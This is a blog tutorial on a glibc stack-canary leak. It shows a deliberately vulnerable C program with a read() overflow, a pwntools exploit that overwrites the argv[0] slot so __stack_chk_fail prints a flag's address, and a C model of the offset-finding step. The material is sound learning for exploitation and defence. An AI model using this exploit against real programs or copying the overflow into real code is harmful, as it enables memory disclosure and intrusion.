Canary: Leaking Data via __stack_chk_fail

Chiu

When `__stack_chk_fail` reports a smashed canary it prints `__libc_argv[0]`, i.e. `argv[0]` of `main`, as the program name. That pointer lives on the stack, in the `argv` array above `main`'s frame. If the same overflow that trips the canary also reaches that slot, the pointer can be replaced with the address of whatever we want to read, and the abort message prints it for us. The canary check itself does the printing, so no control over the return address is needed.

Note: newer glibc versions no longer include `__libc_argv[0]` on this path; `__fortify_fail` prints `*** stack smashing detected ***: terminated` with no program name, so the technique only works against older libc builds.

From glibc (an older version, where the program name is still printed):

```c
void __attribute__ ((noreturn)) __stack_chk_fail (void)
{
  __fortify_fail ("stack smashing detected");
}

void __attribute__ ((noreturn)) internal_function __fortify_fail (const char *msg)
{
  /* The loop is added only to keep gcc happy. */
  while (1)
    __libc_message (2, "*** %s ***: %s terminated\n",
                    msg, __libc_argv[0] ?: "<unknown>");
    /* The second %s is argv[0]: whatever pointer now sits in that stack slot
       is printed as a string, which is the leak. */
}
```

Example program:

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

const char flag[] = "flag{this_is_a_flag}";   /* the data we want to leak */

void vuln() {
    char buf[0x100];
    puts("please input:");
    read(0, buf, 0x1000);   /* up to 0x1000 bytes into a 0x100-byte buffer: stack overflow */
}

int main() {
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);

    vuln();

    return 0;
}

// gcc pwn.c -o pwn -no-pie -g
// Relies on gcc's default stack protector (add -fstack-protector if your toolchain
// does not enable it); -no-pie gives flag a fixed address the exploit can use.
```

Exploit:

```python
from pwn import *

elf = ELF("./pwn")
context(arch=elf.arch, os=elf.os)
context.log_level = 'debug'
p = process([elf.path])

# Debug aid: break on __stack_chk_fail so __libc_argv[0] can be inspected after the overflow.
gdb.attach(p, "b __stack_chk_fail\nc")
pause()

# Offset discovery (done once under gdb): send a cyclic pattern with 8-byte
# subsequences (the post generated it with `cyclic 0x500`), hit the breakpoint
# and run `print __libc_argv[0]`; the value found there is 'paaaaaac', and
# `cyclic -l paaaaaac` gives offset 520.
# p.sendafter(b"please input:", cyclic(0x500, n=8))

# 'a' * 520 reaches the argv[0] slot; the canary is smashed along the way, so
# __stack_chk_fail prints whatever the slot now points at. The binary is -no-pie,
# so elf.sym['flag'] (from .symtab, which holds names, types and addresses of
# functions, variables and other symbols) is the runtime address of flag.
p.sendafter(b"please input:", b'a' * 520 + p64(elf.sym['flag']))
p.interactive()
```
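The whole procedure above (find the offset with a cyclic pattern, then overwrite the argv[0] slot with the address of `flag`) as an added, self-contained C model; this is not code from the post and it performs no real overflow. The stack is laid out as a struct whose fields are an assumption chosen so that argv[0] sits 520 bytes past `buf`, the offset the post measured with gdb; the real distance between `vuln`'s buffer and the `argv` array depends on the binary and libc. The de Bruijn generator is the same construction pwntools' `cyclic` uses, and `epilogue_model` returns what glibc's `__fortify_fail` would print (or NULL when the canary is intact).

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Modelled stack, lowest address first: vuln's buffer, canary, saved rbp and
 * return address, the frames between vuln and the argv array, then the argv[0]
 * slot __libc_argv points at. The 30 "outer" qwords are an assumption chosen so
 * argv0 sits 520 bytes past buf, the offset the post measured with gdb. */
struct frame_model {
    char     buf[0x100];
    uint64_t canary, saved_rbp, ret_addr;
    uint64_t outer_frames[30];
    char    *argv0;
};

static const char flag[] = "flag{this_is_a_flag}";

/* read(0, buf, 0x1000) model: bytes land at buf (the first member) and run
 * upwards, bounded only by the size of the modelled stack. */
static void vuln_model(struct frame_model *f, const unsigned char *in, size_t len)
{
    memcpy(f, in, len > sizeof *f ? sizeof *f : len);
}

/* vuln() epilogue: NULL when the canary is intact; otherwise the string glibc's
 * __fortify_fail prints after "*** stack smashing detected ***: ", which is
 * __libc_argv[0] ?: "<unknown>", i.e. whatever pointer now sits in that slot. */
static const char *epilogue_model(const struct frame_model *f, uint64_t saved)
{
    if (f->canary == saved) return NULL;
    return f->argv0 ? f->argv0 : "<unknown>";
}

/* de Bruijn sequence prefix over 'a'..'z' (FKM algorithm), the construction
 * behind pwntools' cyclic(): every n-byte window of the output is unique. */
static void db(int t, int p, int k, int n, unsigned char *a,
               unsigned char *out, size_t *pos, size_t maxlen)
{
    if (*pos >= maxlen) return;
    if (t > n) {
        if (n % p == 0)
            for (int j = 1; j <= p && *pos < maxlen; j++)
                out[(*pos)++] = (unsigned char)('a' + a[j]);
        return;
    }
    a[t] = a[t - p];
    db(t + 1, p, k, n, a, out, pos, maxlen);
    for (int j = a[t - p] + 1; j < k; j++) {
        a[t] = (unsigned char)j;
        db(t + 1, t, k, n, a, out, pos, maxlen);
    }
}

/* Step 1 of the post: overflow with `cyclic 0x500` (8-byte windows), read the
 * value that landed in argv[0] (what `print __libc_argv[0]` shows in gdb) and
 * look it up in the pattern, as `cyclic -l` does. */
long find_argv0_offset(void)
{
    unsigned char pat[0x500], a[16] = {0};
    struct frame_model f = {0};
    size_t pos = 0;
    uint64_t val;

    db(1, 1, 26, 8, a, pat, &pos, sizeof pat);
    vuln_model(&f, pat, sizeof pat);
    memcpy(&val, &f.argv0, sizeof val);
    for (size_t i = 0; i + sizeof val <= sizeof pat; i++)
        if (memcmp(pat + i, &val, sizeof val) == 0)
            return (long)i;
    return -1;
}

/* Step 2: 'a' * offset + p64(&flag). The 'a's trample the canary, so the
 * epilogue takes the error path and prints our pointer as the program name. */
const char *leak_via_stack_chk_fail(size_t offset)
{
    unsigned char payload[sizeof(struct frame_model)];
    struct frame_model f = {0};
    const char *target = flag;
    uint64_t saved_canary = 0x1122334455667700ULL;  /* low byte 0, as on x86-64 */

    if (offset + sizeof target > sizeof payload) return "<unknown>";
    f.canary = saved_canary;
    memset(payload, 'a', offset);
    memcpy(payload + offset, &target, sizeof target);   /* p64(elf.sym['flag']) */
    vuln_model(&f, payload, offset + sizeof target);
    return epilogue_model(&f, saved_canary);
}

int main(void)
{
    long off = find_argv0_offset();                       /* 520 in this model */
    printf("argv[0] offset: %ld\n", off);
    printf("*** stack smashing detected ***: %s terminated\n",
           leak_via_stack_chk_fail((size_t)off));
    return 0;
}
```

Two things the model makes visible that the exploit script does not: a payload that stops short of the canary (`leak_via_stack_chk_fail(0)`) leaks nothing, because the error path is never taken, and the pattern lookup only works because every 8-byte window of the de Bruijn sequence is unique, which is why the post's `cyclic -l` needs the same subsequence length the pattern was generated with.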



  • Title: Canary: Leaking Data via __stack_chk_fail
  • Author: Chiu
  • Created at: 2024-07-31 13:56:29
  • Updated at: 2024-07-31 13:57:13
  • Link: https://github.com/Idealist17/github.io/2024/07/31/Canary-利用-stack-chk-fail函数泄露数据/
  • License: This work is licensed under CC BY-NC-SA 4.0.